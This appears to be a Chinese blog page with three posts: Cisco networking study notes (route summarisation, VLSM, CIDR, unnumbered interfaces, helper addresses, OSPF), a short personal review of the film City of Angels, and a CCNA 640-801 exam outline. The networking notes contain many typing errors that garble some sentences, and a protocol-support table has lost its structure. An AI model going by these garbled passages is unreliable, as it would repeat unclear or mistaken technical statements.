路由归纳是当我们采用了一种体系化编址规划后的一种用一个IP地址代表一组IP地址的集合的方法.通过对路由进行归纳,我们能够将路由表条目保持为可管理的, 而它可以带来以下益处:
——提高路由(转发)效率;
——当重新计算路由表或通过路由表条目检索一个匹配时,所需的CPU周期数减少了;
——降低了对路由器的内存需求
——在网络发生变化时可以更快的收敛
——容易排错
l有效的地址分配
体系化编址使我们能够利用所有可能的地址,因为我们的地址分组是连续的;

可变长度子网掩码 (VLSM)
VLSM提出供了在一个主类(A、B、C类)网络内包含多个子网掩码的能力,以及对一个子网的再进行子网划分的能力。它的优点如下:
l对IP地址更为有效的使用-如果不采用VLSM,公司将被限制为在一个A、B、C类网络号内只能使用一个子网掩码;
l就用路由归纳的能力更强-VLSM允许在编址计划中有更多的体系分层,因此可以在路由表内进行更好的路由归纳。

路由归纳
在大型互连网络中,存在着成百上千的网络。在这环境中,一般不希望路由器在它的路由表中保存所有的这些路由。路由归纳(也被子称为路由聚合或超网s upernetting)可以减少路由器必须保存的路由条目数量,因为它是在一个归纳地址中代表一系列网络号的一种方法。

在大型 、复杂的网络中使用路由归纳的另一个优点是它可以使其它路由器免受网络拓朴结构变化的影响。

只有在就用了一个正确的地址规划时,路由归纳才能可行和最有效,在子网环境中,当网络地址是以2的指数形式的连续区块时,路由归纳是最有效的。

路由选择协议根据共享网络地址部分来归纳或聚合路由。无类别路由选择协议—OSPF和EIGRP-支持基于子网地址,包括VLSM编者按址的路由归纳。有类别路由选择协议- RIPv1和IGRP-自动地在有类别网络的边界上归纳路由。有类别路由选择协议不支持在任何其它比特边界上的路由归纳,而无类别路由选择协议支持在任何比特边界上的路由归纳。
因为路由表的条目少了,路由归纳可以减少对路由器内存的占用,减少路由选择协议造成的网络流量。要使网络中的路由归纳能够正确的工作,必须满足下面要求:
l多个IP地址必须共享相同的高位比特;
l路由选择协议必须根据32比特的IP地址和高达32比特的前缀长度来作出路由转发决定
l路由更新必须将前缀长度(子网掩码)与32比特的IP地址一起传输。

Cisco路由器中路由归纳的*作
CISCO通过以下两种方法来管理路由归纳:
l发送路由归纳
l从路由归纳中选择路由

地址不连续的子网是指由其它不同的主类网络所分开的同一主类网络中的一些子网

路由选择协议对路由归纳的支持情况
协议是否在有类别网络边界自动归纳?能否关闭自动归纳是否能够在的类别网络边界之外进行归纳
RIPv1是否否
RIPv2是是否
IGRP是否
EIGRP是是是
OSPF否–是


无类别域间路由(CIDR)

CIDR是开发用于帮助减缓IP地址和路由表增大问题的一项技术。CIDR的理念是多个C类地址块可以被组合或聚合在一起生成更大的无类别I P地址集(也就是说允许有更多的主机)。成块的C类地址是分配给各个ISP的


在串行接口上使用无编号IP地址
要在不给接口分配一个明确IP地址的前提出下在串行接口上启用IP处理功能,可以使用 "ip unnumbered type number"接口配置命令。在该命令中"type number"是路由器上具有分配的IP地址的另一个接口(该接口被称为指定接口或参考接口,即无编号接口从其处借用IP地址的那个接口)的类型和编号。它不能是另一个无编号接口。如果要关闭串行接口中的I P处理功能,可心使用该命令的NO形式。

无编号接口的限制:
l使用HDLC、PPP、LAPB、SLIP协议的串行接口,以及隧道接口可以采用无编号方式。不能在X。25或交换式多兆位数据服务SMDS接口上使用无编号接口配置命令。
l我们不能使用PING命令来确定无编号接口是否已经UP了,因为该接口没有地址。SNMP可以远程监控该接口状态。
例子:
Interface Ethernet0 Ip address 10.1.1.1 255.255.255.0!interface Serial0 ip unnumbered Ethernet0


使用帮助地址(Helper Address)

路由器是不转达发广播的,帮助地址通过将这些广播数据包直接转发到目标服务器而帮助客户机和服务器建立联系。

帮助地址命令将广播性目的地地址改变为单点传达室送地址(或一个定向的广播-在某个子网内的本广播),使该广播消息可以被路由到一个具体的目的地而不是所有地方

使用"ip helper-address address"接口配置命令配置一个可能会接收到广播的接口。在该命令中"ADDRESS"是指在转发用户数据报协议(UDP)广播时所使用的目的地地址。该指定地址可以是远程服务器的单点传送地址或定向广播地址。

如果定义了"ip helper-address address"命令,为8个缺省UDP端口进行转发的功能就被自动启用,它们是:TFTP(69)、DNS(53)、时间(37)、NETBIOS服务(137)、N ETBIOS数据报服务(138)、BOOTP服务器(67)、BOOTP客户机(68)和终端访问控制器访问控制系统TACACS(49)。
如果定义了"ip helper-address address"命 令 和 指 定 了 这 8 个 U D P端 口 的"ip forward-protocol udp"命令,那么寻址这8个UDP端口的广播数据包将被自动转发。

"ip forward-protocol"描述:
"ip forward-protocol"命令描述
udpUDP-传输层协议
port(任选)当指定了"udp"关键字时,可以定义UDP目的地端口号或端口名
nd网络磁盘;无盘Sun工作站使用的一种老的协议
sdns网络安全协议

实例:
Interface Ethernet 0 Ip address 172.16.1.100 255.255.255.0 Ip helper-address 172.16.2.2!ip forward-protocol udp 3000no ip forward-protocol udp tftp

"ip helper-address"命令必须被配置在接收到最初客户广播数据包的路由器接口上。


第 三 章 在 单 个 区 域 办 配 置OSPF
OSPF是一项链路状态型技术,比如路由选择信息协议(RIP)这样的距离矢量型技术相对。OSPF协议完成各路由选择协议算法的两大功能:路径选择和路径交换。

OSPF是一种内部网关协议(IGP),也就是说它在属于同一自治系统的路由器间发布路由信息。

OSPF是为解决RIP不能解决的大型、可扩展的网络需求而写的OSPF解决了以下问题:
l收敛速率
l对可变长度掩码(VLSM)的支持
OSPF、RIPV2支持VLSM,RIP只支持固定长度子网掩码(FLSM)
l网络可达性
RIP跨度达16跳时被认为是不可达,OSPF理论上没有可达性限制
l带宽占用
RIP每隔30秒广播一次完整路由,OSPF只有链路发生变化才更新
l路径选择方法
RIP是基于跳数选择最佳路径的,OSPF采用一种路径成本(cost)值(对于Cisco路由器它基于连接速率)作为路径选择的依据。OSPF与RI P、IGRP一样直持等开销路径

OSPF信息在IP数据包内,使用协议号89
OSPF可以运行在广播型网络或非广播型网络上


在广播型多路访问拓朴结构中的OSPF运行

Hello协议负责建立和维护邻居关系
通过IP多目组广播224.0.0.5,也被称为ALLSPFROUTER (所有SPF路由器)地址,Hello数据包被定期地从参与OSPF的各个接口发送出去。

Hello数据包中所包含的信息如下:
l路由器ID
这个32比特的数字在一个自治系统内唯一的标识一个路由器。它缺省是选用活跃接口上的最高IP地址。这个标识在建立邻居关系和直辖市运行在网络中S PF算法拷贝的消息时是很重要的。
lHELLO间隔和DOWN机判断间隔(dead interval)
HELLO间隔规定了路由发送HELLO的时间间隔(秒)。DOWN机判定间隔是路由器在认为相邻路由器失效之前等待接收来自邻居消息的时间,单位为秒,缺省是H ELLO间隔的4倍。
l邻居
这些是已经建立了双向通信关系的相邻路由器
l区域ID
要能进行通信,两台路由器必须共享一个共同的网络分段
l路由器优先级
这8个比特数字指明了在选择DR和BDR时这台路由器的优先级。
lDR和BDR的IP地址
l认证口令
l未节(stb)区域标志


OSPF数据包头中的各个域:
l版本号 1(字节数)
l类型 1
HELLO
链路状态请求
链路状态更新
链路状态确认
l数据包长度 2
l路由器ID 4
l区域ID 4
l校验和 2
l认证类型 2
l认证 8
l数据 可变的


指定路由器DR和备用指定路由器BDR
在一个以太网分段这样的多路访问环境中的路由器必须选举一个DR和BDR来代表这个网络。在DR运行时,BDR不执行任何DR功能。但它会接收所有信息,只是不做处理而已,由D R完成转发和同步的任务。BDR只有当DR失效时才承担DR的工作,

DR和BDR的价值:
l减少路由更新数据流
DR和BDR为给定多路访问网络上的链路状态信息交换起着中心点的作用。每台路由器都有必须建立与DR和BDR的毗邻关系,DR向多路访问网中的所有其它路由器发送各路由的链路状态信息。这一扩散过程大大减少了网络分段上与路由器相关的数据流。
l管理链路状态同步
DR和BDR可保证网络上的其它路由器都有有关于网络的相同链路状态信息
毗邻关系是存在于路由器与其DR和BDR之间的关系。毗邻的路由器将具有同步的链路状态数据库

2005年07月20日

        很早的片了,不过那时候只是看了介绍而已,没有什么感触,而后却也没什么机会去看她。今天终于有机会看了一遍。

        看完电影,我发现我的眼睛竟然有些许湿润,实在是惊讶不已。我似乎很久没有被感动了。其实电影只是一部人神相恋的简单故事。如果是国内的人来拍,她就成了什么龙女啊,牛郎织女啊,或者七仙女的故事啦;如果在安徒生童话里,她也许就是人鱼与王子的故事。然而后几者却是很难感动我——尽管他们都是悲剧结尾,尽管他们都是跨越距离的爱情。为什么这么说?

       我不知道如何去描述我的感受,但我知道我被玛姬片头所表现的那种极其强烈的责任感所打动;我被塞斯不论玛姬的过去甚至现在如何,也愿意付出永生的代价,去追寻那瞬间的爱情所感动;我也被片尾塞斯在承受失去爱人的痛苦后勇敢面对新的人生所激励。

       打动我的,感动我的,激励我的,这些都是那么真实,却又似乎离我那么的遥远。我似乎从来没有这些东西,又似乎一直封印着这些东西?到底是什么,我想现在我不用去找那个答案了。

       我似乎有了自己的方向,不,不是似乎,是真的有了自己的方向。

       最后,我想我应该对Nicolas Cage ,Meg Ryan ,Brad Silberling 致谢!      

◆考试时间:90分钟。

  ◆考试题量:56道试题。

  ◆考试题型:3道路由模拟题;少数连线题;多数多项选择题及其它形式的题型。

  ◆考试内容:Planning & Designing、Implementation & Operation、Troubleshooting及Technology。即:网络设计规划、网络搭建作业、网络故障处理、网络技术要点这四项。

  1、网络设计规划:应用思科网络技术搭建一个简单的网络

           规划IP寻址方案,分析设计需求

           基于用户需求选择适当的路由协议

           应用思科网络技术搭建一个简单的接入网络

           基于用户需求配置适当的访问控制列表

           基于用户需求选择适当的广域网服务


  2、网络搭建作业:根据用户需求,配置适当路由协议

           在路由器和主机上配置IP地址,子网掩码,网关地址

           配置路由器附带管理功能

           在交换机上配置VLAN及交换机间通信

           操作实现局域网

           在特定的网络环境下配置交换机

           管理操作系统及设备配置文件

           执行路由器初始化配置

           执行交换初始化配置

           实现访问控制列表

           实现简单的广域网协议

  3、网络故障处理:利用OSI 7层模型知识知道解决网络故障问题

           完成局域网及虚拟局域网故障处理

           解决路由协议问题

           解决IP地址及主要配置问题

           解决运转网络的设备故障问题

           解决访问控制列表引起的故障问题

           执行简单的广域网故障处理

  4、网络技术要点:用OSI分层模型描述网络通信

           描述生成树协议的处理过程

           比较对照个中局域网环境的主要特性

           评估路由协议特征

           评估TCP/IP协议通信处理过程及相关协议组

           描述网络设备组件特性

           评估TCP/IP协议通信处理过程及相关协议组

           评估网络设备组件特性

           评估数据包处理规则

           评估广域网关键特性

  思科互联网学习解决小组(Internet Learning Solutions Gruop)负责人介绍:新推出的CCNA 640-801考试内容新增CCNP知识点,包括:OSPF、EIGRP、可变长度子网掩码(Variable length subnet masking)及高级变换技术配置。此次升级考试并不是缩小考试范围,它的广度和深度比640-607增加不少。